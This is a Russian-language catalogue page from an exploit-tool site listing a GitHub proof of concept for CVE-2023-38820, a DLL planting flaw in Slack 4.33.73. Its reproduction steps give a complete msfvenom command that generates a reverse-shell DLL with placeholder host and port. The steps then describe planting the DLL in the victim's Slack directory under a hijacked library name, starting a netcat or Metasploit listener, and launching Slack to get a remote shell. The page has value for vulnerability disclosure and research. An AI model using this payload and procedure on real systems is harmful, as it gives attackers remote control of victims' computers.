Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
DLL-Planting-Slack-4.33.73-CVE-2023-38820 — Внедрение DLL в Slack 4.33.73 - CVE-2023-38820 | Kitploit
Инструменты/GitHubGitHub/trailer2/dll-planting-slack-4.33.73-cve-2023-38820
Повышение привилегийАнализ уязвимостейЭксплуатацияЛатеральное перемещениеПост-эксплуатацияРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubtrailer2/dll-planting-slack-4.33.73-cve-2023-38820

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

DLL-Planting-Slack-4.33.73-CVE-2023-38820

Внедрение DLL в Slack 4.33.73 - CVE-2023-38820

Репозиторий
3 лет назадЕщё не проверено

DLL-Planting-Slack-4.33.73-CVE-2023-38820

Внедрение DLL в Slack 4.33.73 - CVE-2023-38820 Обнаружил: Идан Малихи

Описание

Проблема в Slack v.4.33.73 позволяет локальному злоумышленнику выполнить произвольный код через механизм загрузки DLL в файлах profapi.dll, CRYPTBASE.dll, KBDUS.DLL, DPAPI.dll, MSASN1.dll, mf.dll, mfplat.dll и RTWorkQ.DLL.

Шаги для воспроизведения

Для эксплуатации уязвимости злоумышленник должен загрузить и установить программу Slack, а затем выполнить следующие шаги:

  1. Создать вредоносный DLL-файл с помощью msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o profapi.dll
  2. Переместить вредоносный DLL-файл на компьютер жертвы
  3. Открыть путь Slack: "C:\Users\idan.m\AppData\Local\slack\app-4.33.73"
  4. Переместить вредоносный DLL в путь Slack и назвать его, например, "KBDUS.DLL".
  5. Открыть netcat или слушатель metasploit
  6. Запустить Slack.exe
  7. Получить обратную оболочку.
Скачать инструмент